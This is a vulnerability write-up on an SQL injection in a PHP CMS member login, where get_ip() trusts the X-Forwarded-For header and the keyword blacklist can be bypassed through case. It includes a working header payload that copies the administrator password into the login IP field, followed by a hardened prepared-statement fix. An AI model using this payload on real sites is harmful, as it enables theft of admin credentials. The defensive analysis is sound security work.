member/member.php file:
//........................
$ip = fl_html(fl_value(get_ip()));
$sql = "update " . DB_PRE . "member set member_time = '{$addtime}', member_ip = '{$ip}' where id = {$last_id}";
$GLOBALS['mysql']->query($sql);
//........................
Tracing the source of {$_SESSION['m_ip']}:
elseif ($action == 'out') {
    $m_ip = fl_html(fl_value(get_ip()));
    $_SESSION['m_ip'] = $m_ip;
Tracing the source of fl_html(fl_value(get_ip())):
get_ip() function:
function get_ip() {
    // Both header-derived values are returned exactly as the client sent them.
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        return $_SERVER['REMOTE_ADDR'];
    }
}
The return value of get_ip() can be forged: HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR come from request headers that the client controls.
fl_value() function:
function fl_value($str) {
    if (empty($str)) { return; }
    // Keyword blacklist: matching substrings are deleted from the input.
    return preg_replace('/select | insert | update | and | in | on | left | joins | delete | \% | \ sss =|\/\* | \.\.\/| \.\/| union | from | where | group | into | load_file | outfile/', '', $str); // the match is case-sensitive, so the filter can be bypassed
}
The fl_html() function does not get in the way: it only applies htmlspecialchars(), which is HTML encoding, not SQL escaping.
function fl_html($str) {
    return htmlspecialchars($str);
}
Exp: register a user. Set the request header X-Forwarded-For: 127.1', member_ip = (SELECT admin_password FROM bees_admin) whEre member_user = 'your user'#. Log in. The last login IP address is changed to the administrator password.
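
A hardened counterpart to get_ip() and the member_ip update, as an added example that is not code from the application discussed above: the address comes from REMOTE_ADDR (X-Forwarded-For is consulted only behind a listed proxy), is validated with filter_var(), and is written through a bound parameter. The names client_ip(), record_login(), $trustedProxies, the member table layout and the in-memory SQLite database are assumptions made for the demonstration.

```php
<?php
// Added example. Hypothetical names: client_ip(), record_login(), $trustedProxies.

function client_ip(array $server, array $trustedProxies = []): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    // Only look at X-Forwarded-For when the direct peer is a known reverse proxy.
    if (in_array($remote, $trustedProxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // Walk the hop list right to left; the first hop that is not one of
        // our own proxies is treated as the client.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        foreach (array_reverse($hops) as $hop) {
            if (in_array($hop, $trustedProxies, true)) { continue; }
            $remote = $hop;
            break;
        }
    }
    // Reject anything that is not a syntactically valid IPv4/IPv6 address.
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

function record_login(PDO $db, int $id, string $ip): void {
    // Bound parameters: the value travels as data and is never parsed as SQL.
    $stmt = $db->prepare('UPDATE member SET member_time = :t, member_ip = :ip WHERE id = :id');
    $stmt->execute([':t' => time(), ':ip' => $ip, ':id' => $id]);
}

// Constructed demo data: in-memory SQLite stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member (id INTEGER PRIMARY KEY, member_time INTEGER, member_ip TEXT)');
$db->exec("INSERT INTO member (id, member_ip) VALUES (1, '')");

// Constructed request: the header carries a string that is not an IP address.
$forged = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => "127.1', member_ip = 'x"];
$ip = client_ip($forged);   // header ignored: the peer is not a trusted proxy
record_login($db, 1, $ip);
echo $db->query('SELECT member_ip FROM member WHERE id = 1')->fetchColumn(), "\n";

// The same header arriving through a trusted proxy still fails validation.
$viaProxy = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => "127.1', member_ip = 'x"];
echo client_ip($viaProxy, ['10.0.0.5']), "\n";
```

Either control alone closes this path; keeping both means a later change to the proxy list or to the query cannot reopen it by itself.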